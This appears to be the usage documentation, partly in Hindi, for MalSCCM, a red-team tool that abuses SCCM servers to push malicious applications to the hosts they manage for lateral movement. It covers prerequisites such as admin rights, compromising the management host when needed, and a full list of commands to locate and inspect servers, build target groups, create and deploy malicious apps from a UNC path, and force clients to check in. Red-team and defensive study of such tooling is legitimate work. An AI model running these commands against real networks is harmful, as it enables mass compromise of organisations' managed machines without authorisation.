
SCCM सर्वरों का दुरुपयोग करके, प्रबंधित होस्टों पर दुर्भावनापूर्ण एप्लिकेशन तैनात करें, जिससे पार्श्व गति और रेड टीम संचालन किया जा सके।
यह उपकरण आपको स्थानीय या दूरस्थ SCCM सर्वरों का दुरुपयोग करके उनके द्वारा प्रबंधित होस्ट पर दुर्भावनापूर्ण एप्लिकेशन तैनात करने की अनुमति देता है। इस उपकरण का उपयोग करने के लिए आपकी वर्तमान प्रक्रिया के पास SCCM सर्वर पर व्यवस्थापक अधिकार होने चाहिए।
आमतौर पर SCCM की तैनाती में प्रबंधन सर्वर और प्राथमिक सर्वर एक ही होस्ट पर होते हैं, ऐसी स्थिति में locate कमांड से लौटाए गए होस्ट को प्राथमिक सर्वर के रूप में उपयोग किया जा सकता है।
यदि ऐसा नहीं है, तो आपको locate से लौटाए गए प्रबंधन होस्ट से समझौता करना होगा ताकि आप उस होस्ट पर फिर से locate चला सकें और प्राथमिक सर्वर होस्टनाम प्राप्त कर सकें। एक बार जब आपके पास वह और व्यवस्थापक पहुंच हो, तो आप तैयार हैं!
अधिक जानकारी के लिए नीचे दिए गए ब्लॉग को देखें।
PowerSCCM (https://github.com/PowerShellMafia/PowerSCCM) को भारी श्रेय, जिस पर यह सब आधारित है, यह @harmj0y, @jaredcatkinson, @enigma0x3, @mattifestation के काम के बिना नहीं हो पाता।
नीचे सूचीबद्ध कमांड में वैकल्पिक पैरामीटर <> में हैं।
Attempt to find the SCCM management and primary servers:
MalSCCM.exe locate
Inspect the primary server to gather SCCM information:
MalSCCM.exe inspect </server:PrimarySiteHostname> </all /computers /deployments /groups /applications /forest /packages /primaryusers>
Create/Modify/Delete Groups to add targets in for deploying malicious apps. Groups can either be for devices or users:
MalSCCM.exe group /create /groupname:example /grouptype:[user|device] </server:PrimarySiteHostname>
MalSCCM.exe group /delete /groupname:example </server:PrimarySiteHostname>
MalSCCM.exe group /addhost /groupname:example /host:examplehost </server:PrimarySiteHostname>
MalSCCM.exe group /adduser /groupname:example /user:exampleuser </server:PrimarySiteHostname>
Create/Deploy/Delete malicious applications:
MalSCCM.exe app /create /name:appname /uncpath:""\\unc\path"" </server:PrimarySiteHostname>
MalSCCM.exe app /delete /name:appname </server:PrimarySiteHostname>
MalSCCM.exe app /deploy /name:appname /groupname:example /assignmentname:example2 </server:PrimarySiteHostname>
MalSCCM.exe app /deletedeploy /name:appname </server:PrimarySiteHostname>
MalSCCM.exe app /cleanup /name:appname </server:PrimarySiteHostname>
Force devices of a group to checkin within a couple minutes:
MalSCCM.exe checkin /groupname:example </server:PrimarySiteHostname>